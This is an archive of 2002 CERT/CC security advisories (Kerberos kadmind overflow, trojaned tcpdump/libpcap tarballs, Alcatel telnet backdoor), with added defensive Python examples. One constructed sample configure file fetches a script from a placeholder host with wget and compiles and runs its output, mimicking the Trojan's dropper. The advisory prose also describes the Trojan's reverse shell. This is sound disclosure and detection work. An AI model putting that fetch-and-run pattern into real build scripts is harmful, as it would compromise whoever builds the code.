The CERT Coordination Center thanks the staff at the Sendmail Consortium for bringing this issue to our attention.

_________________________________________________________________

Feedback can be directed to the authors: Chad Dougherty, Marty Lindner.

______________________________________________________________________

This document is available from: http://www.cert.org/advisories/CA-2002-28.html
______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

October 08, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPaNCtmjtSoHZUTs5AQHXrgQA2CkSFrIQxV9dLy07J0ezZgT2RrfCDpXY
lPO0HhPe4kcbw4AMXs5LAjhA7DoW32PjAytRWOCNMu1FFDbl3eohf7OP2ZjtgYnD
kwpfjPKVejJDD1BX2O/+jb1rlUKOm2tIt7NK+w8HKOKUYZal/x3RI3AxnAAGLv8A
/DNWpyNYsGg=
=fL1h
-----END PGP SIGNATURE-----

From - Fri Oct 25 13:58:50 2002
Date: Fri, 25 Oct 2002 13:55:16 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-29 Buffer Overflow in Kerberos Administration Daemon

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-29 Buffer Overflow in Kerberos Administration Daemon

Original issue date: October 25, 2002
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

* MIT Kerberos version 4 and version 5 up to and including krb5-1.2.6
* KTH eBones prior to version 1.2.1 and KTH Heimdal prior to version 0.5.1
* Other Kerberos implementations derived from vulnerable MIT or KTH code

Overview

Multiple Kerberos distributions contain a remotely exploitable buffer overflow in the Kerberos administration daemon. A remote attacker could exploit this vulnerability to gain root privileges on a vulnerable system.

The CERT/CC has received reports that indicate that this vulnerability is being exploited. In addition, MIT advisory MITKRB5-SA-2002-002 notes that an exploit is circulating. We strongly encourage sites that use vulnerable Kerberos distributions to verify the integrity of their systems and apply patches or upgrade as appropriate.

I. Description

Kerberos is a widely used network protocol that uses strong cryptography to authenticate clients and servers. The Kerberos administration daemon (typically called kadmind) handles password change and other requests to modify the Kerberos database. The daemon runs on the master Key Distribution Center (KDC) server of a Kerberos realm. The code that provides legacy support for the Kerberos 4 administration protocol contains a remotely exploitable buffer overflow.
The vulnerable code does not adequately validate data read from a network request. This data is subsequently used as an argument to a memcpy() call, which can overflow a buffer allocated on the stack. An attacker does not have to authenticate in order to exploit this vulnerability, and the Kerberos administration daemon runs with root privileges.

Both Massachusetts Institute of Technology (MIT) and Kungl Tekniska Högskolan (KTH) Kerberos are affected, as well as operating systems, applications, and other Kerberos implementations that use vulnerable code derived from either the MIT or KTH distributions. In MIT Kerberos 5, the Kerberos 4 administration daemon is implemented in kadmind4. In KTH Kerberos 4 (eBones), the Kerberos administration daemon is implemented in kadmind. KTH Kerberos 5 (Heimdal) also implements the daemon in kadmind; however, the Heimdal daemon is only affected if compiled with Kerberos 4 support. Since the vulnerable Kerberos administration daemon is included in the MIT Kerberos 5 and KTH Heimdal distributions, both Kerberos 4 sites and Kerberos 5 sites that enable support for the Kerberos 4 administration protocol are affected.

Further information about this vulnerability may be found in VU#875073. MIT has released an advisory that contains information about this vulnerability:

http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2002-002-kadm4.txt

The KTH eBones and Heimdal web sites also contain information about this vulnerability:

KTH eBones
http://www.pdc.kth.se/kth-krb/

KTH Heimdal
http://www.pdc.kth.se/kth-krb/

In addition to resolving the vulnerability described in VU#875073, version 0.5.1 of KTH Heimdal contains other fixes related to the KDC. See the ChangeLog for more information:

ftp://ftp.pdc.kth.se/pub/heimdal/src/heimdal-0.5-0.5.1.diff.gz

This vulnerability has been assigned CAN-2002-1235 by the Common Vulnerabilities and Exposures (CVE) group.

II. Impact

An unauthenticated, remote attacker could execute arbitrary code with root privileges. If an attacker is able to gain control of a master KDC, the integrity of the entire Kerberos realm is compromised, including user and host identities and other systems that accept Kerberos authentication.

III. Solution

Apply a patch or upgrade

Apply the appropriate patch or upgrade as specified by your vendor. See Appendix A below and the Systems Affected section of VU#875073 for specific information.

Disable vulnerable service

Disable support for the Kerberos 4 administration protocol if it is not needed. In MIT Kerberos 5, this can be achieved by disabling kadmind4. For information about disabling all Kerberos 4 support in MIT Kerberos 5 at compile time, see

http://web.mit.edu/kerberos/www/krb5-1.2/krb5-1.2.6/doc/install.html#SEC24

In KTH Heimdal, it is necessary to recompile kadmind in order to disable support for the Kerberos 4 administration protocol. For information about disabling all Kerberos 4 support in KTH Heimdal at compile time, see

http://www.pdc.kth.se/heimdal/heimdal.html#Building%20and%20Installing

This solution will prevent Kerberos 4 administrative clients from accessing the Kerberos database. It will also prevent users with Kerberos 4 clients from changing their passwords. In general, the CERT/CC recommends disabling any service that is not explicitly required.

Block or restrict access

Block access to the Kerberos administration service from untrusted networks such as the Internet. Furthermore, only allow access to the service from trusted administrative hosts. By default, the Kerberos 4 administration daemon listens on 751/tcp and 751/udp, and the Kerberos 5 administration daemon listens on 749/tcp and 749/udp. It may be necessary to block access to the Kerberos 5 administration service if the daemon also supports the Kerberos 4 administration protocol.
This workaround will prevent administrative connections and password change requests from blocked networks. Note that this workaround will not prevent exploitation, but it will limit the possible sources of attacks.

Appendix A. Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.

Apple Computer, Inc.

The Kerberos Administration Daemon was included in Mac OS X 10.0, but removed in Mac OS X 10.1 and later. We encourage sites that use vulnerable Kerberos distributions to verify the integrity of their systems and apply patches or upgrade as appropriate.

Conectiva

Our MIT Kerberos 5 packages in Conectiva Linux 8 do contain the vulnerable kadmind4 daemon, but it is not used by default nor is it installed as a service. Updated packages are being uploaded to our ftp server and should be available in a few hours at:

ftp://atualizacoes.conectiva.com.br/8/

The krb5-server-1.2.3-3U8_3cl.i386.rpm package contains a patched kadmind4 daemon. An announcement will be sent to our security mailing list a few hours after the upload is complete.

Debian

Debian has released DSA-178:

http://www.debian.org/security/2002/dsa-178

FreeBSD

Both the FreeBSD base Kerberos 4 (kadmind) and Kerberos 5 (k5admind v4 compatibility) daemons were vulnerable and have been corrected as of 23 October 2002. In addition, the heimdal and krb5 ports contained the same vulnerability and have been corrected as of 24 October 2002. A Security Advisory is in progress.

KTH Kerberos

The eBones and Heimdal web sites have information about this vulnerability:

KTH eBones
http://www.pdc.kth.se/kth-krb/

KTH Heimdal
http://www.pdc.kth.se/kth-krb/

Microsoft Corporation

Microsoft's implementation of Kerberos is not affected by this vulnerability.
MIT Kerberos

MIT has released MIT krb5 Security Advisory 2002-002:

http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2002-002-kadm4.txt

NetBSD

NetBSD has released NetBSD-SA2002-026:

ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2002-026.txt.asc

OpenBSD

OpenBSD has released Security Fix 016 for OpenBSD 3.1 and Security Fix 033 for OpenBSD 3.0.

OpenBSD 3.1
http://www.openbsd.org/errata31.html#kadmin

OpenBSD 3.0
http://www.openbsd.org/errata30.html#kadmin

Openwall

Openwall GNU/*/Linux is not vulnerable. We don't provide Kerberos.

SuSE

SuSE Linux 7.2 and later are shipped with Heimdal Kerberos included, but Kerberos 4 support is disabled in all releases. Therefore, SuSE Linux and SuSE Enterprise Linux are not affected by this bug. [See also: SuSE-SA:2002:034]

Wind River Systems (BSDI)

No version of BSD/OS is vulnerable to this problem.

Appendix B. References

* http://web.mit.edu/kerberos/www/
* http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2002-002-kadm4.txt
* http://web.mit.edu/kerberos/www/krb5-1.2/krb5-1.2.6/doc/install.html#SEC24
* http://www.pdc.kth.se/kth-krb/
* http://www.pdc.kth.se/heimdal/
* http://www.pdc.kth.se/heimdal/heimdal.html#Building%20and%20Installing

_________________________________________________________________

Authors: Art Manion and Jason A. Rafail.

______________________________________________________________________

This document is available from: http://www.cert.org/advisories/CA-2002-29.html
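The Description section of CA-2002-29 states the defect class plainly: a length read from the network is handed to memcpy() without being checked against the stack buffer it writes into. The memory corruption itself cannot be reproduced in Python, but the missing validation can be shown. The block below is an added example, not MIT, KTH or CERT/CC code, and the request layout it parses ([2-byte big-endian length][payload]) is constructed for illustration; it is not the Kerberos 4 administration protocol, and BUF_SIZE is an assumed size. It checks the three things the advisory implies the vulnerable code did not: that a header is present at all, that the declared length fits the destination buffer, and that the declared length does not exceed the bytes actually received.

```python
"""Validating a network-supplied length before it drives a copy.

Added example modelled on the defect class in CA-2002-29. The request layout
is constructed for illustration and is NOT the Kerberos 4 administration
protocol; BUF_SIZE is an assumed size standing in for the daemon's stack buffer.
"""
import struct

BUF_SIZE = 256                       # assumed fixed-size destination buffer

OK = "OK"
SHORT_HEADER = "SHORT_HEADER"        # fewer than 2 bytes received
EXCEEDS_BUFFER = "EXCEEDS_BUFFER"    # declared length > destination buffer
TRUNCATED = "TRUNCATED"              # declared length > bytes actually received


def validate_request(packet: bytes, buf_size: int = BUF_SIZE) -> str:
    """Return OK or a reason code. Never touches the destination buffer."""
    if len(packet) < 2:
        return SHORT_HEADER
    (declared,) = struct.unpack("!H", packet[:2])
    if declared > buf_size:
        return EXCEEDS_BUFFER
    if declared > len(packet) - 2:
        return TRUNCATED
    return OK


def parse_request(packet: bytes, buf_size: int = BUF_SIZE) -> bytes:
    """Copy the payload into a fixed-size buffer only after validation."""
    status = validate_request(packet, buf_size)
    if status != OK:
        raise ValueError(status)
    (declared,) = struct.unpack("!H", packet[:2])
    dest = bytearray(buf_size)
    dest[:declared] = packet[2:2 + declared]   # declared <= buf_size: no growth
    return bytes(dest[:declared])


def unchecked_copy_size(packet: bytes, buf_size: int = BUF_SIZE) -> int:
    """Model of the unchecked pattern: trust 'declared' and copy that many bytes.

    In C this writes past the end of the stack buffer. A Python bytearray
    cannot be overrun, so it silently grows instead; a result larger than
    buf_size is the sign that the C equivalent would have overflowed.
    """
    (declared,) = struct.unpack("!H", packet[:2])
    dest = bytearray(buf_size)
    dest[:declared] = packet[2:2 + declared]   # no comparison against buf_size
    return len(dest)


def make_request(payload: bytes, declared: int = None) -> bytes:
    """Build a request; 'declared' lets a caller lie about the length (constructed input)."""
    if declared is None:
        declared = len(payload)
    return struct.pack("!H", declared) + payload


if __name__ == "__main__":
    good = make_request(b"constructed request body")
    print(validate_request(good), parse_request(good))
    oversized = make_request(b"A" * 300)
    print(validate_request(oversized), unchecked_copy_size(oversized))
```

The order of the checks matters: comparing the declared length against the destination buffer first means a lying length field is rejected before any byte of payload is looked at, and the truncation check then protects against a peer that declares more than it sends.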
Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from
http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site
http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.

_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.
Revision History

October 25, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPbluwGjtSoHZUTs5AQFRbgQApOEHrz7fSu37W8quhTH34fn4E3Jq/Aih
fTTy4b+hVwLujxlws+5lgug9vBd/QVrZEPT+g7xqBNtpsG+XBlAvUDIZJytKz6vN
rTZbMEyKc6PK92n4OJ1iRgG7WaZibEXaeScZSclEgY8yAkQmoVZUzvwzgZaFXXfQ
ihRKZyB9lbc=
=/bkR
-----END PGP SIGNATURE-----

Date: Mon, 28 Oct 2002 19:45:13 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CORRECTION - CERT Advisory CA-2002-29 Buffer Overflow in Kerberos Administration Daemon

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CORRECTION: CERT Advisory CA-2002-29
Buffer Overflow in Kerberos Administration Daemon

October 28, 2002

The initial version of CERT Advisory CA-2002-29, sent on 2002-10-25, contained incorrect references to Debian and SuSE security advisories. This error has been corrected on our web site.

Debian Security Advisory DSA-178 and SuSE Security Advisory SuSE-SA:2002:034 DO NOT address the vulnerability described in CA-2002-29 and VU#875073.

Debian has confirmed that they are affected and are working on patches. Updated information about Debian will be posted as soon as it is available.

As noted in their statement, SuSE includes Heimdal Kerberos with Kerberos 4 support disabled.
For the most current information, including which systems are affected and vendor statements, please see the following documents:

CERT Advisory CA-2002-29
http://www.cert.org/advisories/CA-2002-29.html

Vulnerability Note VU#875073
http://www.kb.cert.org/vuls/id/875073#systems

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iQCVAwUBPb3G82jtSoHZUTs5AQJnQAP+LH+idodpXbjiym6Iaos8qprvSazwdccW
9QafaE4aU8kl9ns2UPpZ3c8HC/EG79zaedRx6QN/YM27TcRE+gnSlzu/xljZBpjs
iEnmW5m3AltGgp30c/Wr1R3B7BoU+0fWU1ofT5a6cGBoLQJVnjMPakHHc3X8CIy2
6C7vW3tmfB0=
=+i4N
-----END PGP SIGNATURE-----

Date: Wed, 13 Nov 2002 16:14:20 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions

Original issue date: November 13, 2002
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Overview

The CERT/CC has received reports that several of the released source code distributions of the libpcap and tcpdump packages were modified by an intruder and contain a Trojan horse. We strongly encourage sites that use, redistribute, or mirror the libpcap or tcpdump packages to immediately verify the integrity of their distribution.

I. Description

The CERT/CC has received reports that some copies of the source code for libpcap, a packet acquisition library, and tcpdump, a network sniffer, have been modified by an intruder and contain a Trojan horse. The following distributions were modified to include the malicious code:

tcpdump
md5sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz
md5sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz

libpcap
md5sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz

These modified distributions began to appear in downloads from the HTTP server www.tcpdump.org on or around Nov 11 2002 10:14:00 GMT. The tcpdump development team disabled download of the distributions containing the Trojan horse on Nov 13 2002 15:05:19 GMT. However, the availability of these distributions from mirror sites is unknown. At this time, it does not appear that related projects such as WinPcap and WinDump contain this Trojan horse.
The Trojan horse version of the tcpdump source code distribution contains malicious code that is run when the software is compiled. This code, executed from the tcpdump configure script, will attempt to connect (via wget, lynx, or fetch) to port 80/tcp on a fixed hostname in order to download a shell script named services. In turn, this downloaded shell script is executed to generate a C file (conftes.c), which is subsequently compiled and run.

When executed, conftes.c makes an outbound connection to a fixed IP address (corresponding to the fixed hostname used in the configure script) on port 1963/tcp and reads a single byte. Three possible values for this downloaded byte are checked, each causing conftes.c to respond in different ways:

* 'A' will cause the Trojan horse to exit
* 'D' will cause the Trojan to fork itself, spawn a shell, and redirect this shell to the connected IP address (Note that communication to and from this shell is obfuscated by XORing all bytes with the constant 0x89.)
* 'M' will cause the Trojan horse to close the connection and sleep for 3600 seconds

To mask the activity of this Trojan horse in tcpdump, libpcap, the underlying packet-capture library of tcpdump, has been modified (gencode.c) to explicitly ignore all traffic on port 1963 (i.e., a BPF expression of "not port 1963").

II. Impact

An intruder operating from (or able to impersonate) the remote address specified in the malicious code could gain unauthorized remote access to any host that compiled a version of tcpdump with this Trojan horse. The privilege level under which this malicious code would be executed would be that of the user who compiled the source code.

III. Solution

We encourage sites using libpcap and tcpdump to verify the authenticity of their distribution, regardless of where it was obtained.
Where to get libpcap and tcpdump

While the compromise of these distributions is being investigated, the tcpdump and libpcap maintainers recommend using the following distribution sites:

http://sourceforge.net/projects/tcpdump/
http://sourceforge.net/projects/libpcap/

Sites that mirror the source code are encouraged to verify the integrity of their sources. We also encourage users to inspect any and all other software that may have been downloaded from the compromised site. Note that it is not sufficient to rely on the timestamps or sizes of the file when trying to determine whether or not you have a copy of the Trojan horse version.

Verifying checksums

The MD5 hashes of the vendor suggested updates for libpcap and tcpdump are as follows:

tcpdump
md5sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz

libpcap
md5sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz

As a matter of good security practice, the CERT/CC encourages users to verify, whenever possible, the integrity of downloaded software. For more information, see
http://www.cert.org/incident_notes/IN-2001-06.html

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Conectiva

We have checked all our released libpcap and tcpdump packages and confirmed that they do not contain the trojan code.

Debian

Problematic packages are only distributed in Debian/unstable. I have examined both source packages and they did not contain the trojan code the HLUG reported on their web page. Hence, I guess that Debian distributes safe source.

MontaVista Software, Inc.

We have examined our sources, and our software does not contain this trojan. We are not vulnerable to this advisory.

SuSE

SuSE Linux products are not vulnerable.
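Two checks that follow from the description of the Trojan horse and from the checksum guidance above, written for this page as an added Python example (not code from the advisory or from the tcpdump project): classifying a downloaded tarball by MD5 against the digests quoted in the advisory (both the Trojan horse releases and the maintainers' clean releases), and scanning an unpacked source tree for the indicators the advisory describes (a download tool invoked from configure, the conftes.c dropper, and the "not port 1963" filter in gencode.c). The sample source tree the script builds is constructed, the hostname in it is a placeholder, and the regular expressions are heuristics of this example, so a hit is a reason to inspect the file by hand, not proof of compromise.

```python
"""Integrity checks for a libpcap/tcpdump download (added example for CA-2002-30).

1. classify_tarball(): MD5 of a file against the digests printed in the advisory.
2. scan_tree(): look for the indicators the advisory describes in an unpacked tree.
"""
import hashlib
import os
import re
import tempfile

# Digests exactly as printed in CA-2002-30 (section I and "Verifying checksums").
TROJANED_MD5 = {
    "3a1c2dd3471486f9c7df87029bf2f1e9": "tcpdump-3.6.2.tar.gz",
    "3c410d8434e63fb3931fe77328e4dd88": "tcpdump-3.7.1.tar.gz",
    "73ba7af963aff7c9e23fa1308a793dca": "libpcap-0.7.1.tar.gz",
}
CLEAN_MD5 = {
    "03e5eac68c65b7e6ce8da03b0b0b225e": "tcpdump-3.7.1.tar.gz",
    "0597c23e3496a5c108097b2a0f1bd0c7": "libpcap-0.7.1.tar.gz",
}


def md5_of_file(path):
    """Stream the file through MD5 so a large tarball is never read into memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def classify_digest(digest):
    """TROJANED / CLEAN / UNKNOWN. UNKNOWN means 'not on either list', not 'safe'."""
    digest = digest.lower()
    if digest in TROJANED_MD5:
        return "TROJANED"
    if digest in CLEAN_MD5:
        return "CLEAN"
    return "UNKNOWN"


def classify_tarball(path):
    return classify_digest(md5_of_file(path))


# (file name to check, pattern, description). Heuristics of this example.
INDICATORS = [
    ("configure", re.compile(r"^\s*(wget|lynx|fetch)\b", re.M),
     "download tool run from configure"),
    ("configure", re.compile(r"\bconftes\.c\b"),
     "dropper source conftes.c (autoconf itself uses conftest.c)"),
    ("gencode.c", re.compile(r"not\s+port\s+1963"),
     "hard-coded filter hiding traffic on port 1963"),
]


def scan_tree(root):
    """Return sorted (relative path, description, line number) for every hit."""
    hits = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            checks = [(p, d) for target, p, d in INDICATORS if target == name]
            if not checks:
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as f:
                text = f.read()
            for pattern, desc in checks:
                for m in pattern.finditer(text):
                    line_no = text.count("\n", 0, m.start()) + 1
                    rel = os.path.relpath(full, root).replace(os.sep, "/")
                    hits.add((rel, desc, line_no))
    return sorted(hits)


def build_sample_tree():
    """Constructed stand-in for an unpacked download (not real tcpdump sources)."""
    root = tempfile.mkdtemp(prefix="ca200230-")
    os.makedirs(os.path.join(root, "tcpdump"))
    os.makedirs(os.path.join(root, "libpcap"))
    with open(os.path.join(root, "tcpdump", "configure"), "w") as f:
        f.write("#!/bin/sh\n"
                "# constructed: autoconf-style script with two planted lines\n"
                "echo \"checking for gcc... yes\"\n"
                "wget -q http://placeholder.invalid/services -O services\n"  # placeholder host
                "sh services > conftes.c && cc conftes.c && ./a.out\n")
    with open(os.path.join(root, "libpcap", "gencode.c"), "w") as f:
        f.write("/* constructed stand-in for gencode.c */\n"
                "static const char *hidden = \"not port 1963\";\n")
    with open(os.path.join(root, "libpcap", "configure"), "w") as f:
        f.write("#!/bin/sh\necho \"checking for conftest.c... ok\"\n")  # benign
    return root


def demo():
    """Run both checks on constructed input and return the results."""
    return {
        "digest_checks": [classify_digest(d) for d in (
            "3a1c2dd3471486f9c7df87029bf2f1e9",    # trojaned tcpdump-3.6.2
            "0597c23e3496a5c108097b2a0f1bd0c7",    # clean libpcap-0.7.1
            "00000000000000000000000000000000")],  # on neither list
        "hits": scan_tree(build_sample_tree()),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real download, run classify_tarball() on the archive before unpacking it and scan_tree() on the unpacked directory; an UNKNOWN digest should be compared with a checksum or signature published by the maintainers rather than trusted on its own.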
_________________________________________________________________

Feedback can be directed to the authors: Roman Danyliw, Chad Dougherty.

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-30.html

Copyright 2002 Carnegie Mellon University.

Revision History

November 13, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPdKvMWjtSoHZUTs5AQGZMQP8DcGYT+7eGybHZv/npf6vXvnnSBkP0J3C
K+vmcr3GttVUjpCQLHZsEUi6j8PBD0LeJyml27BSfpk1zkvJ1XTQJHw/mmagmoHz
rhSCeNDQcxYmPlr+NdDzT9lnJkGAKEsd+/SSNlTUb556VjjR3dYnJB11w1LDyYzE
bnB5WCmOUew=
=UFH/
-----END PGP SIGNATURE-----

Date: Thu, 21 Nov 2002 11:13:19 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-32 Backdoor in Alcatel OmniSwitch AOS

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-32 Backdoor in Alcatel OmniSwitch AOS

Original release date: November 21, 2002
Last revised: --
Source: CERT/CC, Alcatel

A complete revision history can be found at the end of this file.

Systems Affected

* Alcatel OmniSwitch 7700/7800 switches running Alcatel Operating System (AOS) version 5.1.1

Overview

Alcatel has recently discovered a serious vulnerability in AOS version 5.1.1. Exploitation of this vulnerability can lead to full administrative control of the device running AOS.

I. Description

AOS typically runs on network infrastructure devices, such as the Alcatel OmniSwitch 7000 series switch. According to Alcatel:

During an NMAP audit of the AOS 5.1.1 code that runs on the Alcatel OmniSwitch 7700/7800 LAN switches, it was determined a telnet server was listening on TCP port number 6778. This was used during development to access the Wind River Vx-Works operating system. Due to an oversight, this access was not removed prior to product release.

Further information about this vulnerability may be found in VU#181721. This issue is also being referenced as CAN-2002-1272:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1272

II. Impact

An attacker can gain full access to any device running AOS version 5.1.1, which can result in, but is not limited to, unauthorized access, unauthorized monitoring, information leakage, or denial of service.

III. Solution

Upgrade to AOS 5.1.1.R02 or AOS 5.1.1.R03

Contact Alcatel's customer support for the updated AOS.
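A way to confirm from firewall logs that the development telnet service on 6778/tcp described above is not reachable from outside the perimeter, added here as an example and not part of the advisory or of Alcatel's guidance. It parses netfilter-style kernel log lines (the sample lines, the FW-ACCEPT/FW-DROP log prefixes and the internal address ranges are all constructed for this example) and separates external connection attempts the firewall let through from those it dropped. The port set is a parameter, so the same check covers any other management port that should be blocked at the edge.

```python
"""Check firewall logs for exposure of a port that should be blocked at the perimeter
(added example for CA-2002-32; log format and address ranges are assumptions).
"""
import ipaddress
import re

WATCHED_TCP_PORTS = {6778}          # the port named in CA-2002-32; extend as needed

INTERNAL_NETS = [                   # constructed: substitute the organisation's own ranges
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("10.0.0.0/8"),
]

FIELD_RE = re.compile(r"(\w+)=(\S*)")            # KEY=VALUE pairs of a netfilter log line
PREFIX_RE = re.compile(r"kernel:\s*(\S+)\s+IN=")  # the rule's --log-prefix, if any

# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    "Nov 21 11:13:19 fw kernel: FW-ACCEPT IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=192.0.2.10 "
    "LEN=60 PROTO=TCP SPT=40211 DPT=6778 WINDOW=5840 SYN URGP=0",
    "Nov 21 11:13:20 fw kernel: FW-ACCEPT IN=eth1 OUT=eth1 SRC=192.0.2.44 DST=192.0.2.10 "
    "LEN=60 PROTO=TCP SPT=51022 DPT=6778 WINDOW=5840 SYN URGP=0",   # internal source
    "Nov 21 11:13:21 fw kernel: FW-ACCEPT IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=192.0.2.20 "
    "LEN=60 PROTO=TCP SPT=40300 DPT=443 WINDOW=5840 SYN URGP=0",    # unrelated port
    "Nov 21 11:13:25 fw kernel: FW-DROP IN=eth0 OUT= SRC=198.51.100.9 DST=192.0.2.10 "
    "LEN=60 PROTO=TCP SPT=33333 DPT=6778 WINDOW=5840 SYN URGP=0",   # blocked as intended
    "Nov 21 11:13:26 fw kernel: FW-ACCEPT IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=192.0.2.10 "
    "LEN=52 PROTO=TCP SPT=40211 DPT=6778 WINDOW=5840 ACK URGP=0",   # not a new connection
    "Nov 21 11:13:30 fw sshd[412]: Accepted publickey for admin from 192.0.2.44",
]


def parse_kernel_log(line):
    """Return the fields of a netfilter log line, or None if the line is not one."""
    if "kernel:" not in line:
        return None
    fields = dict(FIELD_RE.findall(line))
    if "SRC" not in fields or "DPT" not in fields:
        return None
    m = PREFIX_RE.search(line)
    return {
        "prefix": m.group(1) if m else "",
        "src": fields["SRC"],
        "dst": fields.get("DST", ""),
        "proto": fields.get("PROTO", ""),
        "dpt": int(fields["DPT"]),
        "syn": re.search(r"\bSYN\b", line) is not None,  # connection attempt, not a reply
    }


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def classify_attempts(lines, ports=WATCHED_TCP_PORTS):
    """Split external TCP SYNs to watched ports into 'exposed' (accepted) and 'blocked'."""
    result = {"exposed": [], "blocked": []}
    for line in lines:
        ev = parse_kernel_log(line)
        if ev is None or ev["proto"] != "TCP" or not ev["syn"]:
            continue
        if ev["dpt"] not in ports or is_internal(ev["src"]):
            continue
        key = (ev["src"], ev["dst"], ev["dpt"])
        # Assumption of this example: the drop/reject rule logs with a DROP/REJECT prefix.
        if ev["prefix"].endswith(("DROP", "REJECT")):
            result["blocked"].append(key)
        else:
            result["exposed"].append(key)
    return result


def demo():
    return classify_attempts(SAMPLE_LOG)


if __name__ == "__main__":
    for kind, events in demo().items():
        for src, dst, port in events:
            print(f"{kind}: {src} -> {dst}:{port}/tcp")
```

Any entry under "exposed" means a host outside the internal ranges completed the first step of a connection to the watched port, so the perimeter block the advisory recommends is not in effect for that path.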
Workarounds

Block access to port 6778/TCP at your network perimeter.

Appendix A. - Vendor Information

VU#181721 was written by Alcatel. As new vendor information is reported to the CERT/CC, we will update VU#181721 and note the changes in our revision history.

Appendix B. - References

1. VU#181721: Alcatel OmniSwitch 7700/7800 does not require a password for accessing the telnet server - http://www.kb.cert.org/vuls/id/181721
2. OmniSwitch_7000_brief - http://www.ind.alcatel.com/nextgen/OmniSwitch_7000_brief.pdf
3. CAN-2002-1272 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1272

_________________________________________________________________

We thank Olivier Paridaens and Jeff Hayes of Alcatel for reporting this issue.

_________________________________________________________________

Author: Ian A. Finlay.

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-32.html

Copyright 2002 Carnegie Mellon University.

Revision History

November 21, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPdz1QmjtSoHZUTs5AQEgCwQA1FMmPs+PRy16ZmVS9RatWwRYU/rHSKsJ
WteEDnEVZwOe9tcoZ4WB2lN0NICzpz4ioSeUDTdbo8yOTFpBfM+U4S2/7/ZOWaE5
fBGS3T+9aeecf9t2i1Zavnyr8UNa3MXTo3p4ZC/pBECzSNVxerg7PtHfT8Ee9oLR
29A2ql3qqA0=
=pt0A
-----END PGP SIGNATURE-----

Date: Thu, 21 Nov 2002 17:35:57 -0500
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-33 Heap Overflow Vulnerability in Microsoft Data

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-33 Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC)

Original release date: November 21, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

All Microsoft Windows systems running the following:

